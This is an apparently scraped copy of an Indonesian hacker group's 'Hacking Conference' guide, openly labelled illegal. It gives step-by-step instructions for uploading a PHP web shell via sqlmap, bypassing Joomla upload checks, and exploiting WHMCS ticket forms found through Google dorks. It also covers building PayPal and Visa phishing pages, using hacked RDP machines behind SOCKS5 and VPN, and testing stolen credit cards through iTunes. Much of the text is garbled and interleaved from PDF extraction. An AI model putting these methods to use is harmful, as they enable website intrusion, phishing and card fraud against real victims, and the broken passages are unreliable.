hacking conference 2014


Upload: denny-yow

Post on 02-Jun-2018


8/10/2019 Hacking Conference 2014

http://slidepdf.com/reader/full/hacking-conference-2014 1/22

DOCS HACKING CONFERENCE

Hacking Conference Docs is a set of documentation containing articles about the basic science of hacking.

Part : II

Author : Xcaramel

100 % ILLEGAL

INDONESIAN GREY HAT ARMY

RIAU HACKER TEAM

CODE RIAU COMMUNITY


DISCLAIMER :

This article is for educational use only and do not in any use.

I am not responsible if anything happens.

Personal contact : [email protected]

Visit Us :

igha.net - code-riau.org - blog.code-riau.org - indogreyhatarmy.net - indogreyhatarmy.com - www.indogreyhatarmy.org


Article Content

- How to upload shell use sqlmap
- how to upload file in joomla administrator that do not support
- How to Bypass Register Com Users set only for superadmin
- WHMCS Exploit Submit Ticket
- Carding the method scam page
- How to use RDP
- Checking CVV and Direct Carding


-How to upload shell use sqlmap

1 . First we must have a target first course,example my targethttp://www.example.com/index.php?id=1

2. prepare your uploader script, as below.

PHP Code:

<form enctype ="multipart/form-data" action ="upload.php" method ="POST" ><input name ="uploadedfile" type ="file" />< input type ="submit" value ="Upload File" /></ form > <? php $target_path =basename ( $_FILES [ 'uploadedfile' ][ 'name' ]);if( move_uploaded_file ( $_FILES [ 'uploadedfile' ][ 'tmp_name' ], $targe

t_path )){echo basename ( $_FILES [ 'uploadedfile' ][ 'name' ]). " has been uploaded" ;}else{echo "Error!" ;} ?>

previously used to convert the above script into a hex gan beforeit can be uploaded, the results are as belowConvert script Upload Hex --> http://www.string-functions.com/string-hex.a spx


Next Open Your CMDC:\user\xcaramel>cd c:\SqlmapC:\Sqlmap>C:\Sqlmap>sqlmap.py -u http://www.example.com/index.php?id=1 --sql-shell

would such as this :[15:35:06] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.3.5, Apache 2.2.17


back-end DBMS: MySQL 5[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER sql-shell>

Now type SELECT 0x'Hex 'INTO OUTFILE "PATH / filename";Do not forget to add '0 x 'in front of' HEX '

wait and if lucky you will be notified successfully uploaded, if less fortunate so try again

if it works please browse our files earlier,Http://www.example.com/upload.phpnext upload your files .


- -how to uadministr

1. after login in th2. select options

load file in joomlator that do not sup

administrator open the media m

ort

nager


Command: - Legalof files names, wesitu

and Illegal MIMEPHP in situ,3. if it is then we s

Now we try to uplwill upload a php

Extensions (File Types) there aresimply add the PHP file name, seq

ypes in the column we add the na

ve, if successful will be like this

ad a php file in media manager. Tile file name: kondom.php

any types ential in

e of the

his time I


If Successfully wo


ld like


- How to Byset only foRegistration faileAdmin permisionaccounts.

The first - all the wayright-click and then c

pass Register Comr superadmin

: Registration failed: Only userscan change other Super Admin

out the word - the word "Registrationlick Inspect Elementlalu replace "Regist

sers

ith Super ser

ailed" you ration Failed"


to "Registration Succ

Form input the datathen click on Registr

it will have the wordlink has been sent toactivate the accountemail before you can


ess" and then click Enter!!

ccording to your wishes tion

"our account has been created and anthe email address you entered. Note thby clicking on the activation link whenlogin."


activation at you must

ou get the


WHMCS Exploit Submit TicketGoogle Dork :intext:Powered by WHMCompleteSolution inurl:submitticket.php

intext:Powered by WHMCompleteSolution inurl:clients/submitticket.phpintext:Powered by WHMCompleteSolution inurl:client/submitticket.phpintext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.phpintext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.phpintext:Powered by WHMCompleteSolution inurl:crm/submitticket.phpintext:Powered by WHMCompleteSolution inurl:cp/submitticket.phpintext:Powered by WHMCompleteSolution inurl:manage/submitticket.phpintext:Powered by WHMCompleteSolution inurl:member/submitticket.phpintext:Powered by WHMCompleteSolution inurl:members/submitticket.phpintext:Powered by WHMCompleteSolution inurl:billing/submitticket.phpintext:Powered by WHMCompleteSolution inurl:billings/submitticket.php

intext:Powered by WHMCompleteSolution inurl:support/submitticket.phpintext:Powered by WHMCompleteSolution inurl:help/submitticket.phpintext:Powered by WHMCompleteSolution inurl:secure/submitticket.phpintext:Powered by WHMCompleteSolution inurl:store/submitticket.phpintext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.phpintext:Powered by WHMCompleteSolution inurl:log/submitticket.phpintext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.phpintext:Powered by WHMCompleteSolution inurl:orders/submitticket.phpintext:Powered by WHMCompleteSolution inurl:order/submitticket.phpintext:Powered by WHMCompleteSolution inurl:portal/submitticket.phpintext:Powered by WHMCompleteSolution inurl:mc/submitticket.php

intext:Powered by WHMCompleteSolution inurl:office/submitticket.phpintext:Powered by WHMCompleteSolution inurl:submitticket.php site:comintext:Powered by WHMCompleteSolution inurl:submitticket.php site:orgintext:Powered by WHMCompleteSolution inurl:submitticket.php site:netintext:Powered by WHMCompleteSolution inurl:submitticket.php site:infointext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"

Examples of targets: www.xcaramel.com/client/submitticket.php


3. if it can be now time to send the ticket target

Put the following code in the Form Name, subject, content.


replace url submitticket.ph

Example: http://xcaramel.

Next : upload youigha.net - code-riau.org - b

p so / templates / jxh.php

om/client/templates/jxh.php

files .log.code-riau.org - indogreyhatarmy.net - indogre


- Carding th1. Scam page: PAYPA2. Inbox Mailer: Toolinbox detective not t3. Mail list: some em

4. Letter Chase: emaiemail containing a cidentity will switch t

5. Thinking ability an- Step Step In Here

method scam pag L, VISA, AMAZON, Ebay, Apple s for sending mail to many people direc

o spam ail that you want to at least 100 victims


l in html format which will be sent to tnfirmation email from the web in a scaour webscam

d imagination in developing a combat t

ly to your

jadiin email


e target to charge

ol


• First we have to edprocess.php or usualcode: $ No email senchange in process.phshell-other• The second we do- First we have to setsee the picture belo

it can be changed anpaypal.com com atotell of course, we hasee the following pic

it some parts of the scam page, which ily converted into a send-cc.php find thed in depanya aja tuh change so email, ap The next plug in your scam page hosti

se email sending mailers jangn forget l up the email subject that will be used

:

the key should not wear that in the eato do away with paypal.co co.uk, aftere to think

ure:

part following

ter email ng and other

tternya ore dal,

d domains. that what we


The red line is transfindependence, edit iand put the letter inremember do not ussee the following pic

if successful then the


rmed into a scam link you here we areusing notepad, then after that copy allhe column do not forget to email a curplain html.

ure:

re is success and if the notice failing un


in need of the scripts

ent tick

efine.


- How to use RDP

RDP stands for Remote Desktop Computer; they are normally hackedor bruted random computers.When using you must remember its someone else's computer sodon't download things withouthiding it or use it intensely as the admin can notice, and you will loseyour RDP.

To connect to RDP: Start<Run<Type:mstscA screen will pop up waiting for an IP to be typed.Type the IP and hit connect. The person you bought RDP from will tellyou the login info.When you buy an RDP it will usually look something like thisIP: 98.200.27.44U: administrator P:

After connecting make sure it has Firefox, if not download Firefoxportable and hide itsomewhere within the computer so it can be used without them

noticing.

Download Link:http://portableapps.com/apps/internet/firefox_portableAfter opening the Firefox add the Sock5 that you will be using tomake your IP appear in the cc holder’s area.This is generally secure enough for basic carding but if you want totake the extra

precaution you can connect to the RDP through a VPN. For those whodon’t know, VPN is short for virtual private network, a network that isconstructed by using public wires to connect nodes. These systemsuse encryption and other security mechanisms to ensure that onlyauthorized users can access the network and that the data cannot beintercepted. I don't


love VPN's because even though some sites say they don't log in factthey do. If theFeds/Cops contacted your VPN provider, they have ways of seeingwhere and what you have beenconnecting/doing on the net through their VPN. But it still does cover your IP one more wayso it isn't bad to have a VPN.

There are two sites I recommend for VPN.http://secretsline.biz/en/prices/http://unblockvpn.com/

Secrets Line is a higher quality VPN and has many more locations. Irecommend them but they

don't take payments like PayPal or Money Bookers, and their pricesare a bit higher.Unblockvpn is very cheap for a dedicated IP, only 10$ a month andthey accept PayPal so itis a much more convenient and cheaper, but the VPN service is a bitless professional.

So to sum it up for security1. Change/Cap your network using Sock52. Use Sock5 on RDP to make it more secure3. Total security :(Optional but recommended) VPN<RDP<Sock5How

to Access an RDPIf you are using Windows XP, click Start>RunIf you are using Vista or Windows 7, Click start and in the Entry fieldthat says “Search Programs and Files”

For Apple/Mac computers then please download this program for connecting to RDPwww.microsoft.com/mac/products/remote-desktop/default.mspxType in “mstsc” and hit enter. This will bring up the Remote DesktopWindow. Follow the images provided here to give you a better idea of what to do


- Checking CVV and Direct Carding

The best place to check CVV's is actually iTunes.. Make a new account and simply add the credit card onto it. If it getsaccepted then the credit card is alive and working well if declinedthen the credit card is dead. Many believe that its best to donate for checkingcredit's but it raises a flag to banks when they see random donationsto places like the redcross foundation.

Checked Vs. Unchecked CVV's When a vendor says the credit card ischecked it means he has checked it and is alive, this usually means he has his own checker or merchant account that has this ability. I don’t recommend buyingchecked CVVs as they will usually die quicker and get flagged bybanks. I always buy small amounts of unchecked CVV's at atime and use them within a day so that if it is dead,the vendor can replace. Most vendors replace unchecked within 24hours and don’treplace checkedcredit cards.

Carding Directly Without GiftcardNEVER this will almost always be investigated and highly illegal. Theonly way to do this would be if you have a drop house. This meansAn empty home, a house for sale/renting, or justa house that the person is not there. You can but I don’t recommendto card items directly therehalf the time the item will not be left at the door and it can bedangerous as sometimes thecops will investigate it.If you’regoing to do this it can be successful, but don’t ever order to your


SPECIAL THANKS :

INDONESIAN GREY HAT ARMY

RIAU HACKER TEAM

CODE RIAU COMMUNITY

ALL FAMILY INDONESIAN GREY HAT ARMY

Xie Log - Xcaramel – Xsmouth - SF-Resistance 125 - Codex

H4xor - Ac.Dc - 4Sp1r3 - Biawak Litak - Heartachez - Semeru -The Darkness - Blackboot404 - Zhafran - Ghozie - Otong2 -

Ryuunosuke-sama - CakCukLet88 - D'troid 101 - tioblack67 -indeX - AR.1701 – K4mfret Dot ID and all member .

ALL FAMILY RIAU HACKER TEAM

Xie Log - 730-80Y – Key Lock a.k.a F4Lc0n – Ghozie - Juragan

JengkoL – Gue Berbagi a.k.a Echo Unicode - 0tong2 – Zh4fran – index and all member .

AND YOU THANK YOU